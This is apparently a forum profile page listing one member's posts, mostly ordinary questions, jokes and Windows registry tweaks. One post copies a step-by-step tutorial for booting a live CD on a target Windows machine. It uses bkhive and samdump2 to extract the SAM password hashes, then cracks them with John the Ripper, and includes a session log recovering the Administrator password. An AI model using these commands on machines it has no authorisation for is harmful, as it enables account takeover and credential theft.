Jump to content


  • Content Count

  • Joined

  • Last visited

Community Reputation

0 Neutral

About Ratna

  • Rank
  • Birthday 08/23/1983

Contact Methods

  • MSN
  • ICQ
  • Yahoo

Profile Information

  • Gender
  • Interests
    Web Programming, Networking, Listening music n ....

Previous Fields

  • First Name:
  • Surname:
  • High School:
    Shree Shanti Higher Sec.
  • Village/Town:
  • District:
  • Current University/College:
  • Subject:
  • Town/City:
  • Place of Birth:
  • Web site:
  • Gender:
  1. Hi, I am very first in linux programming.. Which books will be better to refer? or do u have any special link for this? Thanks
  2. Can you tell me this process in some details? I will be thankful for this. Thanks
  3. /* Tutorial By: IronGeek*/ Step 1. Download the Auditor Boot CD ISO and burn it to a CD-R. All of the tools we will be using in this tutorial come on the Auditor Boot CD. Step 2. Insert the Auditor Boot CD into the target system, reboot and set the CD-ROM as the first boot device in the BIOS. Some systems let you hold down a certain function key at startup to choose what media to boot from (on recent Dell’s it’s F12). Step 3. Auditor will begin to boot and ask you what screen resolution you want to use. Choose a resolution that your monitor and video card will support (I use 2 for 1024x768) then hit enter. Step 4. When Auditor finishes booting click on the icon on the KDE bar for a new terminal window (it looks like a little monitor). Below you will see the commands you will have to use to get past SysKey, extract the hashes and attempt to crack the password hashes. Step 5. Mount the local hard disk, most likely hda1: Linux Command: mount /dev/hda1 Step 6. Change the present working directory to the ramdisk so we space to work with the files we will be creating: Linux Command: cd /ramdisk/ Step 7. Auditor comes with Ncuomo’s Samdump2 and Bkhive [6]. We will be using these tools to extract the system key from the System hive and the password hashes from the SAM file. To get the system key we need to use the Bkhive on our SYSTEM file (most likely in C:\WINDOWS\system32/config\SYSTEM, that’s where it is on my XP Pro test box, on some systems it will me in C:\WINNT\system32/config\SYSTEM or perhaps some other drive entirely). By the way, if for some reason you are running NT4 SP3 you will need to use Bkreg instead, all later system (NT4 SP4, 2000 and XP) use Bkhive. To grab the system key and put it into a file we use the following command: Linux Command: bkhive-linux /mnt/hda1/WINDOWS/system32/config/system saved-syskey.txt Step 8. Now that we have the system key we can use it to undo SysKey on the SAM, extract the hashes and place them into a PWDump format file: Linux Command: samdump2-linux /mnt/hda1/WINDOWS/system32/config/sam saved-syskey.txt>password-hashes.txt Step 9. At this point we have a PWDump format file called password-hashes.txt that we could copy off of the system and import into L0phtcrack [7] or Cain [8] (see the old tutorial for details). Since I said we were going to do it all with the Auditor CD and Open Source tools we will use John the Ripper to crack the hashes, but before we can use John we have to extract one of the many wordlists that comes with Auditor. Take a look on the CD in /opt/auditor/full/share/wordlists/ for all of the different wordlists you can use, I’ll use english.txt for this tutorial. To extract english.txt to the ramdisk use the following command: Linux Command: gunzip -c /opt/auditor/full/share/wordlists/english/english.txt.gz> /ramdisk/eng.txt Step 10. Now that everything is in place we can run John with a simple dictionary attack to see if we can crack any of the hashes: Linux Command: john password-hashes.txt -w:eng.txt John detects that the dump file has LM (LAN Manager) hashes in it and chooses the format “NT LM DES [32/32 BS]” automatically. If I had disabled the storing of LM hashes in the SAM I might want to use the –f option to specify the NT hash format and try to crack the NT hashes instead. To do that I would use the following command: Linux Command: john password-hashes.txt -f:NT -w:eng.txt If dictionary attacks aren’t working and you have a lot of time (as well as a fast computer) you can try John’s incremental (brute force) mode and see if it gives you better results: Linux Command: john password-hashes.txt -i:all Incremental mode is limited to only eight characters unless you change the source before you compile it, but at more than eight characters you will likely be waiting a very long time for John to finish. Doing more that eight characters is pointless anyway if you have the LM hashes since there are stored as two seven byte parts (NT hashes are a different story and can be harder to crack). In case you were wondering what all of these commands would look like along with their output here is a copy of my session log that may help you understand how they all work together (notice that the password for the Administrator account is “monkey”): Session Log saved from Auditor CD: root@1[~]# mount /dev/hda1 root@1[~]# cd /ramdisk/ root@1[ramdisk]# bkhive-linux /mnt/hda1/WINDOWS/system32/config/system saved-syskey.txt Bkhive ncuomo@studenti.unina.it Bootkey: 407af4376e55f1fd6d58cc47a4fa4c01 root@1[ramdisk]# samdump2-linux /mnt/hda1/WINDOWS/system32/config/sam saved-syskey.txt>password-hashes .txt Samdump2 ncuomo@studenti.unina.it This product includes cryptographic software written by Eric Young (eay@cryptsoft.com) No password for user Guest(501) No V value! root@1[ramdisk]# gunzip -c /opt/auditor/full/share/wordlists/english/english.txt.gz> /ramdisk/eng.txt root@1[ramdisk]# john password-hashes.txt -w:eng.txt Loaded 3 password hashes with no different salts (NT LM DES [32/32 BS]) MONKEY (Administrator) guesses: 1 time: 0:00:00:03 100% c/s: 1622943 trying: ZZYZX - ZZZZZZZ root@1[ramdisk]# john password-hashes.txt -f:NT -w:eng.txt Loaded 2 password hashes with no different salts (NT MD4 [TridgeMD4]) monkey (Administrator) guesses: 1 time: 0:00:00:12 100% c/s: 464435 trying: zzzzzzzzzzzzzzzzzzzzzz root@1[ramdisk]#
  4. TIP 6: Finding out how many programs are working in background. Solution: Go to: Regedit | HKEY_CURRENT_USER\SessionInformation Now in the right pane search for the entry “ProgramCount”. The number written in brackets besides its value displays the number of programs working in the background. This can be used to find out whether there is some program running in the background without your notice? As you open more programs, the number will increase after you refresh [F5]. TIP 7: Deleting the ‘Recycle bin from desktop. Solution: To delete the recycle bin you need to right click it and select ‘delete’. This is the first thing that your mind would tell you. But when you right click it, you will see no ‘delete’ option in the context menu. So how do you delete it? To delete ‘Recycle bin’, you must know its CLSID value (or Class ID Value). The CLSID value of recycle bin is ‘645FF040-5081-101B-9F08-00AA002F954E’. To be sure, do one thing: right click on the desktop, select ‘properties’ and under the ‘themes’ tab click the ‘save as’ button. The theme will get saved at a location determined by you. Now open this saved file with notepad. In the very first part, you will find a line as: ; Recycle Bin [CLSID\ {645FF040-5081-101B-9F08-00AA002F954E}\DefaultIcon] So here you see the CLSID value of the ‘Recycle Bin’. Now switch to the following Registry key: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\explorer\Desktop\Namespace Find a key with the value of that of the CLSID value of ‘Recycle Bin’. Delete this key. PLESAE EXPORT THIS KEY FOR THE TIME WHEN YOU NEED THE RECYCLE BIN AGAIN ON DESKTOP. After a log off and a log back in, you will find no ‘Recycle Bin’ on the Desktop. Please, please do take a complete backup of the registry before making any changes because this will come handy in case of any failures. -------------------------------------------------------------------------------- TIP 8: Renaming the ‘Recycle Bin’!! Solution: You must have also seen that in the right click context menu of ‘Recycle Bin’ there is no ‘Rename’ option. Of course those having ‘Norton Antivirus’ will change the name by using the antivirus software itself. But that can be done even without that software. Go to the following Key: HKEY_CLASSES_ROOT\CLSID\ {645FF040-5081-101B-9F08-00AA002F954E} As you would be noticing that again the CLSID value comes in use here. Now in the right pane, search for the entry “LocalizedString”. Right click it and select ‘Modify’. Now in the ‘Value Data’ field and write the new name you want to give to the ‘Recycle Bin’. Now Exit the registry editor and refresh your desktop. The new name should appear. If it doesn’t, you will need to restart the computer. -------------------------------------------------------------------------------- TIP 9: Renaming My Computer and changing its icon. Solution: Renaming can be done just by right clicking ‘My Computer’ in the start menu and selecting ‘Rename’. Alternatively you may go to registry at the following location and enter you name of choice in the “(Default)” entry’s ‘Value Data’ filed: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\ {20D04FE0-3AEA-1069-A2D8-08002B30309D} For changing Icons, Go to: Regedit | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\ {20D04FE0-3AEA-1069-A2D8-08002B30309D}\DefaultIcon In the “(Default)” entries change the value to the ‘location and file name of your choice’. Suppose the icon you want to assign is located at ‘D:\Icons’ and has got a filename of ‘Icon_1.ico’. In this case you will need to type down “D:\Icons\Icon_1.ico” in the ‘value data” field
  5. Ratna

    Love affair

    Hi, Tina keep on mailing these kind of jokes. After a long time, i got a chance to enjoywith jokes. Thanks for making me laugh
  6. Hello friends, I want to build my career in computer network field. I have just completed bachelor degree in computer engineering field. I am planning for master degree in network security field but i am not getting exactlly what i am looking for. Would u suggest me any special universities for my master degree in network security field. I hope ur positive result.. thanks.
  7. Thanks ujjwal ji, I will get the result from this page. Thanks again..
  8. Hello guys, After a long time.... Sorry for that.... Any way, i just want to create one topic for u that i am not getting it. Is there any group policy for usb mass storage device? I just want to apply policy for the usb device, so that no body can load the patch or exe file through the usb device. I hope u will do favor with me.. Thanks in advance...
  9. Thanks for taking my problem.... But i can't see a blue screen, It just passes from windows xp start up screen and go to the black screen.. So ctrl+alt+delete doesn't work... Then... I can't follow it..... I hope u will help me with another solutions. Thanks...
  10. Hello frens. My computer always boots up to the startup screen of windows xp and cannot display the desktop. But, it enters into safe mode, and i checked the resolution problem as well as other problem. Still, i am not getting a solution.... I hope i will get a solution.... Thanks....
  11. Hello frens Look at these pictures and enjoy with women controlled society... Thanks
  12. Ratna

    New Sardarji Jokes

    Hello GNOME Ji, Thanks for making me laugh specially wo parachutte and busy wala.. Now i am fresh... Thanks a lot again..
  13. hello, Ujjwal ji, U are great if u really follow these steps...
  14. Hey guys, Are you planning for Mission Impossible III? If yes visit www.missionimpossible.com and get the date. Thanks.
  15. Hi, If u really admire option 1, I think ur girl friend cannot tolerate it. Be careful... Byee
  • Create New...

Important Information

By using this site, you agree to our Terms of Use.